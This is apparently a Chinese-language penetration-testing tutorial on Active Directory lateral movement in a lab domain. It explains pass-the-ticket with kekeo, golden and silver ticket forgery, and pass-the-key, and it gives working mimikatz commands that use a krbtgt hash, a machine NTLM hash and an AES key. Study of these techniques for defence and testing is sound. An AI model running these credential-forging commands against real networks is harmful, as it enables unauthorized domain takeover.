内网环境下的横向移动——利用kekeo ptt

这里使用到不用管理员权限进行ptt，使用到kekeo

1.生成票据

2.导入票据

3.查看票据并访问域控

Golden ticket

Golden ticket的作用是可以生成任意用户的tgt,那么问题就来了,是什么条件能够让他生成任意用户的tgt呢？还得要看kerberos认证的过程,在windows认证过程中，客户端将自己的信息发送给KDC,然后KDC使用krbtgt用户密码的hash作为密钥进行加密，生成TGT。

那么如果获取到了krbtgt的密码hash值，就可以伪造任意tgt了。因为krbtgt只有域控制器上面才有，所以使用黄金凭据意味着你之前拿到过域控制器的权限,黄金凭据可以理解为一个后门

伪造黄金凭据需要具备下面条件：

• krbtgt用户的hash(就意味着你已经有域控制器权限了)

• 域名称

• 域的SID值

• 要伪造的用户名

先登录域控制器，dump krbtgt用户的hash值,获取域sid

登录普通域用户生成TGT凭证

kerberos::golden /user:administrator /domain:Drunkmars.com /sid:S-1-5-21-652679085-3170934373-4288938398-1107 /krbtgt:c1833c0783cfd81d3548dd89b017c99a /ticket:gold.kirbi

注入黄金票据并访问域控

如果开启rpc服务则可以用winexec.vbs直接连接，这里我的域控没有开启rpc服务，所以这里连接没有成功

Sliver ticket

Sliver ticket和golden ticket不同的是,它不需要和域控制器进行通信，原理是伪造TGS，使用的是计算机账户的hash进行加密的，所以只能访问指定的权限。

不像是Golden ticket，是由krgtgt用户的密码hash进行加密，伪造tgt可以获取到所有权限。

白银票据这里只是对单一的服务进行授权，利用过程和golden ticket差不多，首先上域控制器中，把机器的ntlm hash(rc4加密) dump下来,然后在普通域用户机器进行伪造权限,进行ptt。

登录DC，抓取ntlm hash

在普通域用户中生成票据

kerberos::golden /domain:Drunkmars.com /sid:S-1-5-21-652679085-3170934373-4288938398 /target:WIN-M836NN6NU8B.Drunkmars.com /service:cifs /rc4:7c64e7ebf46b9515c56b2dd522d21c1c /user:administrator /ptt

查看票证访问域控

PTK(pass the key)

在连接配置的时候允许使用hash进行认证，而不是只有账号密码才能认证。

就是由于在进行认证的时候，是用用户hash加密时间戳，即使在使用密码进行登录的情况下，也是先把密码加密成hash，再进行认证。因此在只有用户hash，没有明文密码的情况下也是可以进行认证的。不管是rubeus还是impacket里面的相关脚本都是支持直接使用hash进行认证。其中，如果hash的ntlm hash，然后加密方式是rc4，这种就算做是pass the hash，如果是hash是aes key(使用sekurlsa::ekeys导出来)，就算是pass the key。在很多地方，不支持rc4加密方式的时候，使用pass the key不失为一种好方法。

获取aes key

注入aes key

mimikatz "privilege::debug" "sekurlsa::pth /user:mars2 /domain:Drunkmars.com /aes256:a207497d6c9df363b6658271ac0df1862c395d6b32003a5207dde3803f7dae0d"